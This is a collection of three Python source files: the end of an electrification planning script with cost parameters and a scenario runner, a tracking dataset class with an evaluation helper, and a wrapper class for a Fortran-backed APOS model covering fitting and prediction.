max_grid_extension_dist = float(specs[SPE_MAX_GRID_EXTENSION_DIST][country])
urban_elec_ratio = float(specs['urban_elec_ratio'][country])
rural_elec_ratio = float(specs['rural_elec_ratio'][country])
# energy_per_pp_rural = wb_tiers_all[wb_tier_rural]
# energy_per_pp_urban = wb_tiers_all[wb_tier_urban]
mg_pv_cap_cost = specs.loc[country, SPE_CAP_COST_MG_PV]
grid_cap_gen_limit = specs.loc[country, 'NewGridGenerationCapacityTimestepLimit']
#eleclimit = specs[SPE_ELEC_LIMIT][country]
#investlimit = specs[SPE_INVEST_LIMIT][country]
#step_year = start_year + time_step
Technology.set_default_values(base_year=start_year,
start_year=start_year,
end_year=end_year,
discount_rate=0.12,
# grid_cell_area=1,
mv_line_cost=9000,
lv_line_cost=5000,
mv_line_capacity=50,
lv_line_capacity=10,
lv_line_max_length=30,
hv_line_cost=120000,
mv_line_max_length=50,
hv_lv_transformer_cost=3500,
mv_increase_rate=0.1)
grid_calc = Technology(om_of_td_lines=0.03,
distribution_losses=float(specs[SPE_GRID_LOSSES][country]),
connection_cost_per_hh=122,
base_to_peak_load_ratio=float(specs[SPE_BASE_TO_PEAK][country]),
capacity_factor=1,
tech_life=30,
grid_capacity_investment=float(specs[SPE_GRID_CAPACITY_INVESTMENT][country]),
grid_penalty_ratio=1,
grid_price=grid_price)
mg_hydro_calc = Technology(om_of_td_lines=0.03,
distribution_losses=0.05,
connection_cost_per_hh=100,
base_to_peak_load_ratio=1,
capacity_factor=0.5,
tech_life=30,
capital_cost=2500,
om_costs=0.02)
mg_wind_calc = Technology(om_of_td_lines=0.03,
distribution_losses=0.05,
connection_cost_per_hh=100,
base_to_peak_load_ratio=0.9,
capital_cost=2300,
om_costs=0.035,
tech_life=20)
mg_pv_calc = Technology(om_of_td_lines=0.03,
distribution_losses=0.05,
connection_cost_per_hh=100,
base_to_peak_load_ratio=0.9,
tech_life=20,
om_costs=0.018,
capital_cost=mg_pv_cap_cost)
sa_pv_calc = Technology(base_to_peak_load_ratio=0.9,
tech_life=15,
om_costs=0.018,
capital_cost=5500,
standalone=True)
mg_diesel_calc = Technology(om_of_td_lines=0.03,
distribution_losses=0.05,
connection_cost_per_hh=100,
base_to_peak_load_ratio=0.5,
capacity_factor=0.7,
tech_life=15,
om_costs=0.1,
efficiency=0.33,
capital_cost=1200,
diesel_price=diesel_price,
diesel_truck_consumption=33.7,
diesel_truck_volume=15000)
sa_diesel_calc = Technology(base_to_peak_load_ratio=0.5,
capacity_factor=0.7,
tech_life=10,
om_costs=0.1,
capital_cost=2000,
diesel_price=diesel_price,
standalone=True,
efficiency=0.28,
diesel_truck_consumption=14,
diesel_truck_volume=300)
# Used to identify the steps and include them in the results
# ### FIRST RUN - NO TIMESTEP
#
#
# time_step = 12
# year = 2030
# eleclimits = {2030: 1}
#
# # eleclimit = float(input('Provide the targeted electrification rate in {}:'.format(year)))
# eleclimit = eleclimits[year]
# # investlimit = int(input('Provide the targeted investment limit (in USD) for the year {}:'.format(year)))
#
# onsseter.set_scenario_variables(year, num_people_per_hh_rural, num_people_per_hh_urban, time_step, start_year,
# urban_elec_ratio, rural_elec_ratio)
#
#
# onsseter.calculate_off_grid_lcoes(mg_hydro_calc, mg_wind_calc, mg_pv_calc, sa_pv_calc, mg_diesel_calc,
# sa_diesel_calc, year, start_year, end_year, time_step)
#
# onsseter.pre_electrification(grid_calc, grid_price, year, time_step, start_year)
#
# onsseter.run_elec(grid_calc, max_grid_extension_dist, year, start_year, end_year, time_step, grid_cap_gen_limit)
#
# onsseter.results_columns(mg_hydro_calc, mg_wind_calc, mg_pv_calc, sa_pv_calc, mg_diesel_calc, sa_diesel_calc,
# grid_calc, year)
#
# onsseter.calculate_investments(mg_hydro_calc, mg_wind_calc, mg_pv_calc, sa_pv_calc, mg_diesel_calc,
# sa_diesel_calc, grid_calc, year, end_year, time_step)
#
# onsseter.apply_limitations(eleclimit, year, time_step)
#
# onsseter.final_decision(mg_hydro_calc, mg_wind_calc, mg_pv_calc, sa_pv_calc, mg_diesel_calc, sa_diesel_calc,
# grid_calc, year, end_year, time_step)
#
# onsseter.delete_redundant_columns(year)
#
# ### END OF FIRST RUN
# yearsofanalysis = list(range((start_year + time_step), end_year + 1, time_step))
yearsofanalysis = [2030]
eleclimits = {2030: 1}
time_steps = {2030: 15}
# This is used in the calculation of summaries at the end
elements = ["1.Population", "2.New_Connections", "3.Capacity", "4.Investment"]
techs = ["Grid", "SA_Diesel", "SA_PV", "MG_Diesel", "MG_PV", "MG_Wind", "MG_Hydro"]
sumtechs = []
for element in elements:
for tech in techs:
sumtechs.append(element + "_" + tech)
total_rows = len(sumtechs)
df_summary = pd.DataFrame(columns=yearsofanalysis)
for row in range(0, total_rows):
df_summary.loc[sumtechs[row]] = "Nan"
## If one wants time steps please un-comment below section within triple dashes
###
# The runner begins here..
for year in yearsofanalysis:
#eleclimit = float(input('Provide the targeted electrification rate in {}:'.format(year)))
eleclimit = eleclimits[year]
time_step = time_steps[year]
#investlimit = int(input('Provide the targeted investment limit (in USD) for the year {}:'.format(year)))
onsseter.set_scenario_variables(year, num_people_per_hh_rural, num_people_per_hh_urban, time_step,
start_year, urban_elec_ratio, rural_elec_ratio)
onsseter.calculate_off_grid_lcoes(mg_hydro_calc, mg_wind_calc, mg_pv_calc, sa_pv_calc, mg_diesel_calc, sa_diesel_calc, year, start_year, end_year, time_step)
onsseter.pre_electrification(grid_calc, grid_price, year, time_step, start_year)
onsseter.run_elec(grid_calc, max_grid_extension_dist, year, start_year, end_year, time_step, grid_cap_gen_limit)
# if year == end_year:
# onsseter.calculategridyears(start_year, year, gridspeed=10)
# else:
# pass
onsseter.results_columns(mg_hydro_calc, mg_wind_calc, mg_pv_calc, sa_pv_calc, mg_diesel_calc, sa_diesel_calc, grid_calc, year)
onsseter.calculate_investments(mg_hydro_calc, mg_wind_calc, mg_pv_calc, sa_pv_calc, mg_diesel_calc,
sa_diesel_calc, grid_calc, year, end_year, time_step)
onsseter.apply_limitations(eleclimit, year, time_step)
onsseter.final_decision(mg_hydro_calc, mg_wind_calc, mg_pv_calc, sa_pv_calc, mg_diesel_calc, sa_diesel_calc, grid_calc, year, end_year, time_step)
onsseter.calc_summaries(df_summary, sumtechs, year)
### Time step ends here
df_summary.to_csv(summary_csv, index=sumtechs)
onsseter.df.to_csv(settlements_out_csv, index=False)
# if do_combine:
# print('\n --- Combining --- \n')
# df_base = pd.DataFrame()
# summaries = pd.DataFrame(columns=countries)
#
# for country in countries:
# print(country)
# df_add = pd.read_csv(os.path.join(output_dir, '{}_{}_{}.csv'.format(country, wb_tier_urban, diesel_tag)))
# df_base = df_base.append(df_add, ignore_index=True)
#
# summaries[country] = pd.read_csv(os.path.join(output_dir, '{}_{}_{}_summary.csv'.format(country,
# wb_tier_urban,
# diesel_tag)),
# squeeze=True, index_col=0)
#
# print('saving csv')
# df_base.to_csv(os.path.join(output_dir, '{}_{}.csv'.format(wb_tier_urban, diesel_tag)), index=False)
# summaries.to_csv(os.path.join(output_dir, '{}_{}_summary.csv'.format(wb_tier_urban, diesel_tag)))
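# Hedged usage note, not part of the original script: running it directly opens file
# dialogs for the specs workbook and the GIS csv, then prompts for a space-separated list
# of countries (or 'all') and for a choice of 1 (split), 2 (prepare inputs) or
# 3 (run a scenario), which are handled by the branches above.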
|
StarcoderdataPython
|
3248148
|
<reponame>derekray311511/permatrack
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pycocotools.coco as coco
import numpy as np
import torch
import json
import cv2
import os
import math
from ..video_dataset import VideoDataset
class PDTracking(VideoDataset):
num_categories = 5
dataset_folder = 'pd'
default_resolution = [384, 960]
class_name = ['Pedestrian', 'Car', 'Cyclist', 'Caravan/RV', 'Truck']
# negative id is for "not as negative sample for abs(id)".
# 0 for ignore losses for all categories in the bounding box region
# ['Pedestrian', 'Car', 'Bicyclist', 'Bus', 'Caravan/RV', 'OtherMovable',
# 'Motorcycle', 'Motorcyclist', 'OtherRider', 'Train', 'Truck', 'Dontcare']
cat_ids = {1:1, 2:2, 3:3, 4:-9999, 5:4, 6:-2, 7:-9999, 8:-1, 9:-1, 10:-9999, 11:5}
max_objs = 500
def __init__(self, opt, split, rank=None):
data_dir = os.path.join(opt.data_dir, self.dataset_folder)
split_ = 'train' if opt.dataset_version != 'test' else 'test' #'test'
img_dir = data_dir
if split == 'train':
ann_file_ = "train"
else:
ann_file_ = 'val'
ann_path = os.path.join(
data_dir, 'annotations', 'tracking_{}.json'.format(
ann_file_))
self.images = None
super(PDTracking, self).__init__(opt, split, ann_path, img_dir)
self.box_size_thresh = [300, 500, 300, 500, 500]
if opt.only_ped:
self.num_categories = 1
self.class_name = ['person']
self.cat_ids = {1:1, 2:-9999, 3:-1, 4:-9999, 5:-9999, 6:-9999, 7:-9999, 8:-1, 9:-1, 10:-9999, 11:-9999}
self.box_size_thresh = [300]
if opt.nu:
self.num_categories = 8
self.class_name = ['Car', 'Truck', 'Bus', 'Trailer', 'construction_vehicle', 'Pedestrian', 'Motorcycle', 'Bicycle']
self.cat_ids = {1:6, 2:1, 3:0, 4:3, 5:1, 6:-1, 7:-7, 8:0, 9:0, 10:-9999, 11:2, 12:5, 13:-8}
self.box_size_thresh = [500, 500, 500, 500, 500, 300, 500, 500]
self.alpha_in_degree = False
self.depth_scale = 1
self.dep_mask = 0
self.dim_mask = 1
self.rot_mask = 0
self.amodel_offset_mask = 0
self.ignore_amodal = True
self.num_samples = len(self.images)
self.exp_id = opt.exp_id
if opt.const_v_over_occl:
self.const_v_over_occl = True
print('Loaded {} {} samples'.format(split, self.num_samples))
def save_results_ioueval(self, results, save_dir):
formattted_results = []
if not os.path.exists(save_dir):
os.mkdir(save_dir)
for video in self.coco.dataset['videos']:
video_id = video['id']
images = self.video_to_images[video_id]
for image_info in images:
img_id = image_info['id']
if not (img_id in results):
continue
frame_id = image_info['frame_id']
for i in range(len(results[img_id])):
item = results[img_id][i]
if item['age'] != 1:
continue
if 'visibility' in item and not item['visibility']:
continue
category_id = item['class']
track_id = item['tracking_id'] if 'tracking_id' in item else -1
bbox = [item['bbox'][0].item(), item['bbox'][1].item(), item['bbox'][2].item() - item['bbox'][0].item(), item['bbox'][3].item() - item['bbox'][1].item()]
entry = {'video_id': video_id, 'image_id': img_id, 'category_id': category_id, 'track_id': track_id, 'bbox': bbox, 'score': item['score'].item()}
formattted_results.append(entry)
print(save_dir + '/iou_eval.json')
json.dump(formattted_results, open(save_dir + '/iou_eval.json', 'w'))
def run_eval(self, results, save_dir, write_to_file=False, dataset_version="val"):
self.save_results_ioueval(results, save_dir)
os.chdir("../tao")
command = 'python scripts/evaluation/evaluate.py ' + \
'../data/%s/annotations/tracking_%s_tao.json ' % (self.dataset_folder, dataset_version) + \
'{}/iou_eval.json'.format(save_dir) + ' --config-updates CATEGORIES 1,2'
if write_to_file:
print("Writing to file")
command += ' > ../exp/tracking/{}/eval_out.txt'.format(self.exp_id)
os.system(command)
def __len__(self):
return self.num_samples
def _to_float(self, x):
return float("{:.2f}".format(x))
|
StarcoderdataPython
|
1771344
|
<filename>tlux/approximate/apos/test/compare_versions.py
import fmodpy
import os
import numpy as np
_this_dir = os.path.dirname(os.path.abspath(__file__))
# Build a class that contains pointers to the model internals, allowing
# python attribute access to all of the different components of the models.
class AposModel:
def __init__(self, config, model):
self.config = config
self.model = model
self.a_embeddings = self.model[self.config.asev-1:self.config.aeev].reshape(self.config.ade, self.config.ane, order="F")
self.a_input_vecs = self.model[self.config.asiv-1:self.config.aeiv].reshape(self.config.adi, self.config.ads, order="F")
self.a_input_shift = self.model[self.config.asis-1:self.config.aeis].reshape(self.config.ads, order="F")
self.a_state_vecs = self.model[self.config.assv-1:self.config.aesv].reshape(self.config.ads, self.config.ads, max(0,self.config.ans-1), order="F")
self.a_state_shift = self.model[self.config.asss-1:self.config.aess].reshape(self.config.ads, max(0,self.config.ans-1), order="F")
self.a_output_vecs = self.model[self.config.asov-1:self.config.aeov].reshape(self.config.adso, self.config.ado, order="F")
self.m_embeddings = self.model[self.config.msev-1:self.config.meev].reshape(self.config.mde, self.config.mne, order="F")
self.m_input_vecs = self.model[self.config.msiv-1:self.config.meiv].reshape(self.config.mdi, self.config.mds, order="F")
self.m_input_shift = self.model[self.config.msis-1:self.config.meis].reshape(self.config.mds, order="F")
self.m_state_vecs = self.model[self.config.mssv-1:self.config.mesv].reshape(self.config.mds, self.config.mds, max(0,self.config.mns-1), order="F")
self.m_state_shift = self.model[self.config.msss-1:self.config.mess].reshape(self.config.mds, max(0,self.config.mns-1), order="F")
self.m_output_vecs = self.model[self.config.msov-1:self.config.meov].reshape(self.config.mdso, self.config.mdo, order="F")
self.ax_shift = self.model[self.config.aiss-1:self.config.aise]
self.ay_shift = self.model[self.config.aoss-1:self.config.aose]
self.x_shift = self.model[self.config.miss-1:self.config.mise]
self.y_shift = self.model[self.config.moss-1:self.config.mose]
# Allow square brackets to access attributes of this model and its configuration.
def __getitem__(self, attr):
if hasattr(self, attr):
return getattr(self, attr)
elif hasattr(self.config, attr):
return getattr(self.config, attr)
# Create a summary string for this model.
def __str__(self, vecs=False):
# A function for creating a byte-size string from an integer.
def _byte_str(byte_size):
if (byte_size < 2**10):
byte_size = f"{byte_size} bytes"
elif (byte_size < 2**20):
byte_size = f"{byte_size//2**10:.1f}KB"
elif (byte_size < 2**30):
byte_size = f"{byte_size//2**20:.1f}MB"
elif (byte_size < 2**40):
byte_size = f"{byte_size//2**30:.1f}GB"
else:
byte_size = f"{byte_size//2**40:.1f}TB"
return byte_size
# Calculate the byte size of this model (excluding python descriptors).
# TODO: Not all configs are 4 bytes, do more expensive sum over actual sizes?
byte_size = len(self.config._fields_)*4 + self.model.dtype.itemsize*self.model.size
byte_size = _byte_str(byte_size)
if (self.config.rwork_size+self.config.iwork_size > 0):
work_size = self.config.rwork_size*4 + self.config.iwork_size*4
byte_size += " + "+_byte_str(work_size)+" work space"
# Create a function that prints the actual contents of the arrays.
if vecs: to_str = lambda arr: "\n " + "\n ".join(str(arr).split("\n")) + "\n"
else: to_str = lambda arr: "\n"
# Provide details (and some values where possible).
return (
f"APOS model ({self.config.total_size} parameters) [{byte_size}]\n"+
(" apositional\n"+
f" input dimension {self.config.adn}\n"+
f" output dimension {self.config.ado}\n"+
f" state dimension {self.config.ads}\n"+
f" number of states {self.config.ans}\n"+
(f" embedding dimension {self.config.ade}\n"+
f" number of embeddings {self.config.ane}\n"
if self.config.ane > 0 else "")+
f" embeddings {self.a_embeddings.shape} "+to_str(self.a_embeddings)+
f" input vecs {self.a_input_vecs.shape} "+to_str(self.a_input_vecs)+
f" input shift {self.a_input_shift.shape} "+to_str(self.a_input_shift)+
f" state vecs {self.a_state_vecs.shape} "+to_str(self.a_state_vecs)+
f" state shift {self.a_state_shift.shape} "+to_str(self.a_state_shift)+
f" output vecs {self.a_output_vecs.shape} "+to_str(self.a_output_vecs)+
"\n" if (self.a_output_vecs.size > 0) else "") +
(" positional\n"+
f" input dimension {self.config.mdn}\n"+
f" output dimension {self.config.mdo}\n"+
f" state dimension {self.config.mds}\n"+
f" number of states {self.config.mns}\n"+
(f" embedding dimension {self.config.mde}\n"+
f" number of embeddings {self.config.mne}\n"
if self.config.mne > 0 else "")+
f" embeddings {self.m_embeddings.shape} "+to_str(self.m_embeddings)+
f" input vecs {self.m_input_vecs.shape} "+to_str(self.m_input_vecs)+
f" input shift {self.m_input_shift.shape} "+to_str(self.m_input_shift)+
f" state vecs {self.m_state_vecs.shape} "+to_str(self.m_state_vecs)+
f" state shift {self.m_state_shift.shape} "+to_str(self.m_state_shift)+
f" output vecs {self.m_output_vecs.shape} "+to_str(self.m_output_vecs)
if (self.m_output_vecs.size > 0) else "")
)
# Class for calling the underlying APOS model code.
class APOS:
# Make the string function return the unpacked model.
def __str__(self): return str(self.unpack())
# Initialize a new APOS model.
def __init__(self, source="apos.f90", name=None, **kwargs):
try:
import fmodpy
apos = fmodpy.fimport(source, name=name, blas=True,
lapack=True, omp=True, wrap=True,
verbose=False, output_dir=_this_dir,
)
# Store the Fortran module as an attribute.
self.APOS = apos.apos
except:
# TODO:
# - python fallback that supports the basic evaluation of
# a model (but no support for training new models).
raise(NotImplementedError("The Fortran source was not loaded successfully."))
# Set defaults for standard internal parameters.
self.steps = 1000
self.seed = None
self.num_threads = None
self.config = None
self.model = np.zeros(0, dtype="float32")
self.record = np.zeros(0, dtype="float32")
# Default descriptors for categorical inputs.
self.axi_map = []
self.axi_sizes = []
self.axi_starts = []
self.xi_map = []
self.xi_sizes = []
self.xi_starts = []
self.yi_map = []
self.yi_sizes = []
self.yi_starts = []
# Initialize the attributes of the model that can be initialized.
self._init_model(**kwargs)
# Initialize a model, if possible.
def _init_model(self, **kwargs):
# Apositional model parameters.
adn = kwargs.pop("adn", 0)
ado = kwargs.pop("ado", None)
ads = kwargs.pop("ads", None)
ans = kwargs.pop("ans", None)
ade = kwargs.pop("ade", None)
ane = kwargs.pop("ane", None)
# Model parameters.
mdn = kwargs.pop("mdn", None)
mdo = kwargs.pop("mdo", None)
mds = kwargs.pop("mds", None)
mns = kwargs.pop("mns", None)
mde = kwargs.pop("mde", None)
mne = kwargs.pop("mne", None)
# Number of threads.
self.num_threads = kwargs.pop("num_threads", self.num_threads)
self.seed = kwargs.pop("seed", self.seed)
self.steps = kwargs.pop("steps", self.steps)
# Initialize if enough arguments were provided.
if (None not in {adn, mdn, mdo}):
self.config = self.APOS.new_model_config(
adn=adn, ado=ado, ads=ads, ans=ans, ane=ane, ade=ade,
mdn=mdn, mdo=mdo, mds=mds, mns=mns, mne=mne, mde=mde,
num_threads=self.num_threads)
# Set any configuration keyword arguments given at initialization
# that were not passed to "new_model_config".
for n in ({n for (n,t) in self.config._fields_} & set(kwargs)):
setattr(self.config, n, kwargs[n])
# Set all internal arrays and initialize the model.
self.model = np.zeros(self.config.total_size, dtype="float32")
self.APOS.init_model(self.config, self.model, seed=self.seed)
# Generate the string containing all the configuration information for this model.
def config_str(self):
s = ""
max_n_len = max(map(len,(n for (n,t) in self.config._fields_)))
max_t_len = max(map(len,(str(t).split("'")[1].split('.')[1]
for (n,t) in self.config._fields_)))
for (n,t) in self.config._fields_:
t = str(t).split("'")[1].split('.')[1]
s += f" {str(t):{max_t_len}s} {n:{max_n_len}s} = {getattr(self.config,n)}\n"
return s
# Unpack the model (which is in one array) into it's constituent parts.
def unpack(self):
# If there is no model or configuration, return None.
if (self.config is None) or (self.model is None):
return None
return AposModel(self.config, self.model)
# Given a categorical input array, construct a dictionary for
# mapping the unique values in the columns of the array to integers.
def _i_map(self, xi):
if (len(xi.dtype) > 0):
xi_map = [np.unique(xi[n]) for n in xi.dtype.names]
else:
xi_map = [np.unique(xi[:,i]) for i in range(xi.shape[1])]
xi_sizes = [len(u) for u in xi_map]
xi_starts = (np.cumsum(xi_sizes) - xi_sizes[0] + 1).tolist()
return xi_map, xi_sizes, xi_starts
# Given a categorical input array (either 2D or struct), map this
# array to an integer encoding matrix with the same number of
# columns, but unique integers assigned to each unique value.
def _i_encode(self, xi, xi_map, xi_sizes, xi_starts):
xi_rows = xi.shape[0]
xi_cols = len(xi.dtype) or xi.shape[1]
_xi = np.zeros((xi_rows, xi_cols), dtype="int32", order="C")
for i in range(xi_cols):
start_index = xi_starts[i]
num_unique = xi_sizes[i]
unique_vals = xi_map[i]
vals = (xi[:,i:i+1] if len(xi.dtype) == 0 else xi[xi.dtype.names[i]])
eq_val = vals == unique_vals
# Add a column to the front that is the default if none match.
eq_val = np.concatenate((
np.logical_not(eq_val.max(axis=1)).reshape(xi_rows,1),
eq_val), axis=1)
val_indices = np.ones((xi_rows,num_unique+1), dtype="int32") * np.arange(num_unique+1)
val_indices[:,1:] += start_index-1
_xi[:,i] = val_indices[eq_val]
return _xi
# Convert all inputs to the APOS model into the expected numpy format.
def _to_array(self, y, yi, x, xi, ax, axi, sizes):
# Get the number of inputs.
if (y is not None): nm = len(y)
elif (yi is not None): nm = len(yi)
elif (x is not None): nm = len(x)
elif (xi is not None): nm = len(xi)
elif (sizes is not None): nm = len(sizes)
# Make sure that all inputs are numpy arrays.
if (y is not None): y = np.asarray(y, dtype="float32", order="C")
else: y = np.zeros((nm,0), dtype="float32", order="C")
if (yi is not None): yi = np.asarray(yi)
else: yi = np.zeros((nm,0), dtype="int32", order="C")
if (x is not None): x = np.asarray(x, dtype="float32", order="C")
else: x = np.zeros((nm,0), dtype="float32", order="C")
if (xi is not None): xi = np.asarray(xi)
else: xi = np.zeros((nm,0), dtype="int32", order="C")
if (sizes is not None): sizes = np.asarray(sizes, dtype="int32")
else: sizes = np.zeros(0, dtype="int32")
na = sizes.sum()
if (ax is not None): ax = np.asarray(ax, dtype="float32", order="C")
else: ax = np.zeros((na,0), dtype="float32", order="C")
if (axi is not None): axi = np.asarray(axi)
else: axi = np.zeros((na,0), dtype="int32", order="C")
# Make sure that all inputs have the expected shape.
assert (len(y.shape) in {1,2}), f"Bad y shape {y.shape}, should be 1D or 2D matrix."
assert (len(yi.shape) in {1,2}), f"Bad yi shape {yi.shape}, should be 1D or 2D matrix."
assert (len(x.shape) in {1,2}), f"Bad x shape {x.shape}, should be 1D or 2D matrix."
assert (len(xi.shape) in {1,2}), f"Bad xi shape {xi.shape}, should be 1D or 2D matrix."
assert (len(ax.shape) in {1,2}), f"Bad ax shape {ax.shape}, should be 1D or 2D matrix."
assert (len(axi.shape) in {1,2}), f"Bad axi shape {axi.shape}, should be 1D or 2D matrix."
assert (len(sizes.shape) == 1), f"Bad sizes shape {sizes.shape}, should be 1D int vector."
# Reshape inputs to all be two dimensional (except sizes).
if (len(y.shape) == 1): y = y.reshape((-1,1))
if (len(yi.shape) == 1) and (len(yi.dtype) == 0): yi = yi.reshape((-1,1))
if (len(x.shape) == 1): x = x.reshape((-1,1))
if (len(xi.shape) == 1) and (len(xi.dtype) == 0): xi = xi.reshape((-1,1))
if (len(ax.shape) == 1): ax = ax.reshape((-1,1))
if ((len(axi.shape) == 1) and (len(axi.dtype) == 0)): axi = axi.reshape((-1,1))
mdo = y.shape[1]
mdn = x.shape[1]
adn = ax.shape[1]
# Handle mapping "xi" into integer encodings.
xi_cols = len(xi.dtype) or xi.shape[1]
if (xi_cols > 0):
if (len(self.xi_map) == 0):
self.xi_map, self.xi_sizes, self.xi_starts = self._i_map(xi)
else:
assert (xi_cols == len(self.xi_map)), f"Bad number of columns in 'xi', {xi_cols}, expected {len(self.xi_map)} columns."
xi = self._i_encode(xi, self.xi_map, self.xi_sizes, self.xi_starts)
mne = sum(self.xi_sizes)
else: mne = 0
# Handle mapping "axi" into integer encodings.
axi_cols = len(axi.dtype) or axi.shape[1]
if (axi_cols > 0):
if (len(self.axi_map) == 0):
self.axi_map, self.axi_sizes, self.axi_starts = self._i_map(axi)
else:
assert (axi_cols == len(self.axi_map)), f"Bad number of columns in 'axi', {axi_cols}, expected {len(self.axi_map)} columns."
axi = self._i_encode(axi, self.axi_map, self.axi_sizes, self.axi_starts)
ane = sum(self.axi_sizes)
else: ane = 0
# Handle mapping "yi" into integer encodings.
yi_cols = len(yi.dtype) or yi.shape[1]
if (yi_cols > 0):
if (len(self.yi_map) == 0):
self.yi_map, self.yi_sizes, self.yi_starts = self._i_map(yi)
else:
assert (yi_cols == len(self.yi_map)), f"Bad number of columns in 'yi', {yi_cols}, expected {len(self.yi_map)} columns."
yi = self._i_encode(yi, self.yi_map, self.yi_sizes, self.yi_starts)
yne = sum(self.yi_sizes)
else: yne = 0
# Handle mapping integer encoded "yi" into a single real valued y.
if (yne > 0):
embedded = np.concatenate((
np.zeros((1,yne), dtype="float32"),
np.identity(yne, dtype="float32")), axis=0)
_y = np.zeros((nm, mdo+yne), dtype="float32")
_y[:,:mdo] = y[:,:]
for i in range(yi.shape[1]):
_y[:,mdo:] += embedded[yi[:,i]]
y = _y
mdo += yne
# Return all the shapes and numpy formatted inputs.
return nm, na, mdn, mne, mdo, adn, ane, yne, y, x, xi, ax, axi, sizes
# Fit this model.
def fit(self, x=None, y=None, yi=None, xi=None, ax=None, axi=None,
sizes=None, new_model=False, **kwargs):
# Ensure that 'y' values were provided.
assert ((y is not None) or (yi is not None)), "APOS.fit requires 'y' or 'yi' values, but neither were provided (use keyword argument 'y=<values>' or 'yi=<values>')."
# Make sure that 'sizes' were provided for apositional (aggregate) inputs.
if ((ax is not None) or (axi is not None)):
assert (sizes is not None), "APOS.fit requires 'sizes' to be provided for apositional input sets (ax and axi)."
# Get all inputs as arrays.
nm, na, mdn, mne, mdo, adn, ane, yne, y, x, xi, ax, axi, sizes = (
self._to_array(y, yi, x, xi, ax, axi, sizes)
)
# Configure this model if requested (or not already done).
if (new_model or (self.config is None)):
# Ensure that the config is compatible with the data.
kwargs.update({
"adn":adn,
"ane":max(ane, kwargs.get("ane",0)),
"mdn":mdn,
"mne":max(mne, kwargs.get("mne",0)),
"mdo":mdo,
})
if (max(kwargs["mdn"], kwargs["mne"]) == 0):
kwargs["ado"] = kwargs["mdo"]
kwargs["mdo"] = 0
kwargs["mns"] = 0
self._init_model(**kwargs)
# If there are integer embeddings, expand "x" and "ax" to have space to hold those embeddings.
if (self.config.ade > 0):
_ax = np.zeros((ax.shape[0],ax.shape[1]+self.config.ade), dtype="float32", order="C")
_ax[:,:ax.shape[1]] = ax
ax, _ax = _ax, ax
if (self.config.mde > 0) or (self.config.ado > 0):
_x = np.zeros((x.shape[0],self.config.mdi), dtype="float32", order="C")
_x[:,:x.shape[1]] = x
x, _x = _x, x
# ------------------------------------------------------------
# If a random seed is provided, then only 2 threads can be used
# because nondeterministic behavior comes from reordered addition.
if (self.seed is not None):
if (self.config.num_threads > 2):
import warnings
warnings.warn("Seeding an APOS model will deterministically initialize weights, but num_threads > 2 will result in a nondeterministic model fit.")
# Get the number of steps for training.
steps = kwargs.get("steps", self.steps)
# ------------------------------------------------------------
# Set up new work space for this minimization process.
self.APOS.new_fit_config(nm, na, self.config)
self.rwork = np.zeros(self.config.rwork_size, dtype="float32")
self.iwork = np.zeros(self.config.iwork_size, dtype="int32")
# Minimize the mean squared error.
self.record = np.zeros((steps,6), dtype="float32", order="C")
try:
result = self.APOS.minimize_mse(self.config, self.model, self.rwork, self.iwork,
ax.T, axi.T, sizes, x.T, xi.T, y.T,
steps=steps, record=self.record.T)
except:
yw = np.zeros((nm,0), dtype="float32", order="C")
result = self.APOS.minimize_mse(self.config, self.model, self.rwork, self.iwork,
ax.T, axi.T, sizes, x.T, xi.T, y.T, yw.T,
steps=steps, record=self.record.T)
assert (result[-1] == 0), f"APOS.minimize_mse returned nonzero exit code {result[-1]}."
# Copy the updated values back into the input arrays (for transparency).
if (self.config.mde > 0):
_x[:,:] = x[:,:_x.shape[1]]
if (self.config.ade > 0):
_ax[:,:] = ax[:,:_ax.shape[1]]
# Calling this model is an alias for 'APOS.predict'.
def __call__(self, *args, **kwargs):
return self.predict(*args, **kwargs)
# Make predictions for new data.
def predict(self, x=None, xi=None, ax=None, axi=None, sizes=None,
embedding=False, save_states=False, **kwargs):
# Evaluate the model at all data.
assert ((x is not None) or (xi is not None) or (sizes is not None)), "APOS.predict requires at least one of 'x', 'xi', or 'sizes' to not be None."
# Make sure that 'sizes' were provided for apositional (aggregate) inputs.
if ((ax is not None) or (axi is not None)):
assert (sizes is not None), "APOS.predict requires 'sizes' to be provided for apositional input sets (ax and axi)."
# Make sure that all inputs are numpy arrays.
nm, na, mdn, mne, mdo, adn, ane, yne, _, x, xi, ax, axi, sizes = (
self._to_array(None, None, x, xi, ax, axi, sizes)
)
# Embed the inputs into the purely positional form.
ade = self.config.ade
ads = self.config.ads
ado = self.config.ado
mde = self.config.mde
mds = self.config.mds
if (self.config.mdo != 0):
mdo = self.config.mdo
else:
mdo = self.config.ado
# Compute the true real-vector input dimensions given embeddings.
adn += ade
mdn += mde + ado
# ------------------------------------------------------------
# Initialize storage for all arrays needed at evaluation time.
# If there are integer embeddings, expand "ax" and "x" to have
# space to hold those embeddings.
if (self.config.ade > 0):
_ax = np.zeros((ax.shape[0],ax.shape[1]+self.config.ade), dtype="float32", order="C")
_ax[:,:ax.shape[1]] = ax
ax = _ax
ay = np.zeros((na, ado), dtype="float32", order="F")
if (self.config.mde > 0) or (self.config.ado > 0):
_x = np.zeros((x.shape[0],self.config.mdi), dtype="float32", order="C")
_x[:,:x.shape[1]] = x
x = _x
y = np.zeros((nm, mdo), dtype="float32", order="C")
if (save_states):
m_states = np.zeros((nm, mds, self.config.mns), dtype="float32", order="F")
a_states = np.zeros((na, ads, self.config.ans), dtype="float32", order="F")
else:
m_states = np.zeros((nm, mds, 2), dtype="float32", order="F")
a_states = np.zeros((na, ads, 2), dtype="float32", order="F")
# ------------------------------------------------------------
        # Call the underlying library.
info = self.APOS.check_shape(self.config, self.model, ax.T, axi.T, sizes, x.T, xi.T, y.T)
assert (info == 0), f"APOS.predict encountered nonzero exit code {info} when calling APOS.check_shape."
self.APOS.embed(self.config, self.model, axi.T, xi.T, ax.T, x.T)
result = self.APOS.evaluate(self.config, self.model, ax.T, ay, sizes,
x.T, y.T, a_states, m_states, info)
assert (result[-1] == 0), f"APOS.evaluate returned nonzero exit code {result[-1]}."
        # Save the states if that was requested.
if (save_states):
self.a_states = a_states
self.ay = ay
self.m_states = m_states
        # If there are embedded y values in the output, convert them back to the format provided at training time.
if (len(self.yi_map) > 0) and (not embedding):
yne = sum(self.yi_sizes)
_y = [y[:,i] for i in range(y.shape[1]-yne)]
for i in range(len(self.yi_map)):
start = self.yi_starts[i]
size = self.yi_sizes[i]
_y.append(
self.yi_map[i][np.argmax(y[:,start:start+size], axis=1)]
)
return np.asarray(_y).T
elif (embedding and (len(self.yi_map) == 0)):
